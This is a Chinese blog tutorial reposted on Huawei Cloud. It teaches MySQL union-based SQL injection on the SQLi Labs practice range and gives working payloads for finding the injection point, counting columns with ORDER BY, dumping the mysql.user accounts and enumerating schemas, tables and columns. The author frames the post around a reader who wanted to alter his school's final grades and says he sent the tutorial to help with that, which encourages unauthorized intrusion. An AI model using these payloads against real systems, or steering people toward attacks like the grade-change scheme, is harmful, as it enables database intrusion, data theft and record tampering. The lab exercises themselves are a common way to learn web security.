“有本事你去学校数据库把期末成绩改了“,“好,你等着。“

举报
士别三日wyx 发表于 2022/03/01 22:59:47 2022/03/01
【摘要】 「作者主页」:士别三日wyx 「作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者 「专栏简介」:此文章已录入专栏《网络安全快速入门》 前几天,有个粉丝找...

「作者主页」:士别三日wyx
「作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者
「专栏简介」:此文章已录入专栏《网络安全快速入门》

前几天,有个粉丝找到我,说是跟同学吹牛逼,要改学校数据库的期末成绩,问我有没有什么好用的工具。

我说不用工具,有手就行。

考虑到这件事多多少少有一些风险,索性甩给他一篇联合注入使用教程。

“方法就在这里,能不能成功,就看你的造化了!”

一、初识联合注入

C站规矩:先说是什么,再说为什么。

这里有一个测试网站(SQLi Labs靶场的第一关),功能很简单:在地址栏中输入用户id,页面返回对应的用户信息。

比如,我们输入 ?id=1,页面返回id为1的用户名(Dumb)和密码(Dumb):
在这里插入图片描述
输入 ?id=2,页面返回id为2的用户名(Angelina)和密码(I-kill-you):
在这里插入图片描述
正常情况下,页面只能返回用户信息,不能返回其他信息。

接下来,我们在地址栏输入联合注入的payload:

?id=0' union select 1,version(),@@datadir -- a

  
 
  • 1

页面返回的数据不再是用户名和密码,而是返回了数据库的版本和安装路径:
在这里插入图片描述
这违背了网站原本的用意,除了数据库信息以外,我们可以利用联合注入,让页面返回数据库中的所有数据(理论上)。

看到这里,相信你已经对联合注入有了初步的了解,接下来,我会一步一步的为大家讲解,联合注入究竟是怎么查询到这些数据的。

二、执行原理

1. 后台逻辑分析

测试网站的功能很简单:根据id查询用户名和名:
在这里插入图片描述
执行流程分为三步:

  1. 用户输入参数(用户id)
  2. 后台执行SQL(查询用户信息)
  3. 查询结果在前端回显

在这里插入图片描述
知道网站的功能逻辑后,我们来了解一下联合注入的核心:union 关键字

2. 巧用联合查询

MySQL提供了 union 关键字,连接多个查询语句,并将查询结果合并,即联合查询。

我们尝试在查询用户信息(id=1)时,使用 union 关键字,连接另外一个查询语句,在地址栏中输入: ?id=1' union select 1,version(),@@datadir -- a

程序的执行逻辑如下:

在这里插入图片描述
仔细观察一下就会发现,我们已经查询到了其他数据,但页面只能展示第一条数据:
在这里插入图片描述
想让页面展示第二条数据,可以使用分页,但这里我们使用另外一种方式:空查询。

提示1:如果不了解联合查询可以查看下面这张流程图,如果看不懂可以自己尝试编写SQL并观察执行结果。
在这里插入图片描述
提示2:select 1,version(),@@datadir;是MySQL查询语句的一种特殊形式,里面用到了两个函数:

  • version():返回数据库版本
  • @@datadir:返回数据库安装路径

如果你不理解这个查询语句的格式,可以在自己的数据库中执行以下几个SQL,并观察结果:

select database();
select 1;
select 1,2,3;
select 1,database(),version();

  
 
  • 1
  • 2
  • 3
  • 4

3. 空查询

正常的用户id都是从1开始自增的,如果查询的id为0或者是负数,一定是空查询。

在地址栏输入:?id=0' union select 1,version(),@@datadir -- a

程序的执行逻辑如下:
在这里插入图片描述
除此之外,我们可以将 union 右侧的查询语句替换成其他内容,以获取数据库中的所有信息。

以上便是联合查询的基本原理,接下来,我们在实战案例中使用一下联合注入。

三、实战教程

还是上面的测试网站(SQLi Labs靶场的第一关),先来测试注入点。

地址栏输入 ?id=1' and 1 -- a,页面正常显示:
在这里插入图片描述
地址栏输入 ?id=1' and 0 -- a,页面异常(空)显示:
在这里插入图片描述
确定注入点:单引号字符型注入。

接下来,开始使用联合注入,地址栏输入以下payload:

?id=0' union select 1,2 -- a

  
 
  • 1

页面报错了……字段数不同
在这里插入图片描述
MySQL规定,union 关键字连接的两个查询语句,查询的字段数必须保持一致。

这就意味着,我们在使用联合注入之前,必须先要判断网站的查询语句,查询了几个字段,这里,我们使用 order by 来判断查询的字段数。

order by 关键字可以按照指定字段排序,如果排序的字段不存在,则会报错。

利用这一特性,我们可以从第一个字段开始排序,然后是第二个、第三个……,当页面出现报错时,就可以判断出网站的查询字段数。

先按照第一个字段排序,地址栏输入 ?id=1' order by 1 -- a
在这里插入图片描述
再按照第二个字段排序,地址栏输入 ?id=1' order by 2 -- a
在这里插入图片描述
再按照第三个字段排序,地址栏输入 ?id=1' order by 3 -- a
在这里插入图片描述
再按照第四个字段排序,地址栏输入 ?id=1' order by 4 -- a
在这里插入图片描述
第四个字段排序时开始报错,可以确认第四个字段不存在,网站查询语句的查询字段有只有三个。

字段确定以后,我们就可以使用联合查询了,地址栏输入以下payload:

?id=0' union select 1,2,3 -- a

  
 
  • 1

从页面的响应我们可以看到,2和3的位置可以显示出来,1的位置没有显示出来,因此,我们可以在2或者3的位置返回查询结果。
在这里插入图片描述
我们将 2 的位置换成一个函数(获取当前使用的数据库),在地址栏输入以下payload:

?id=0' union select 1,database(),3 -- a

  
 
  • 1

页面中显示了当前使用的数据库:
在这里插入图片描述
接下来,我们在 2 的位置返回查询语句的结果(数据库的所有用户),在地址栏输入以下payload:

?id=0' union select 1,(select group_concat(user) from mysql.user),3 -- a

  
 
  • 1

提示:

  • 使用括号包裹SQL,可以让数据库把括号中的内容当做一个整体执行。
  • 字段处使用 group_concat() 函数,可以将查询结果拼接成一个字符串(可以尝试不加此函数来观察页面的响应结果),不了解次函数的同学可以参考我的另一篇文章:MySQL group_concat函数使用详解

在这里插入图片描述
我们可以在 2 的位置替换不同的查询语句,来获取数据库中的所有数据。

接下来,我们整理一下联合注入的使用步骤。

四、使用步骤

使用前提:页面有显示位

比如用户登录成功以后,会在页面中显示用户名等信息。
需要注意的是,页面中显示的数据必须是动态数据,不能是写死的。

1. 判断注入点类型

同时满足以下两个条件:

?id=1 and true -- a		正常显示
?id=1 and false -- a	空显示

  
 
  • 1
  • 2

2. 判断字段数

?id=1 order by 1 -- a	正常显示
?id=1 order by 2 -- a	正常显示
?id=1 order by 3 -- a	报错或异常显示(字段数为2)

  
 
  • 1
  • 2
  • 3

3. 判断显示位

?id=0 union select 1,2,3 -- a

  
 
  • 1

4. 脱库

脱库就是获取数据库中所有数据的意思,不了解脱库的同学可以参考我的另一篇文章:MySQL脱库原理详解

爆库

?id=-1 union select 1,
	(select group_concat(schema_name)
     from information_schema.schemata)
,3 -- a

  
 
  • 1
  • 2
  • 3
  • 4

爆表

?id=-1 union select 1,
	(select group_concat(table_name)
     from information_schema.tables
	 where table_schema='security')
,3 -- a

  
 
  • 1
  • 2
  • 3
  • 4
  • 5

爆字段

?id=-1 union select 1,
	(select group_concat(column_name)
     from information_schema.columns
	 where table_schema='security' and table_name='users')
,3 -- a

  
 
  • 1
  • 2
  • 3
  • 4
  • 5

感谢你的点赞、收藏、评论,我是三日,祝你幸福!

文章来源: blog.csdn.net,作者:士别三日wyx,版权归原作者所有,如需转载,请联系作者。

原文链接:blog.csdn.net/wangyuxiang946/article/details/123160407

【版权声明】本文为华为云社区用户转载文章,如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。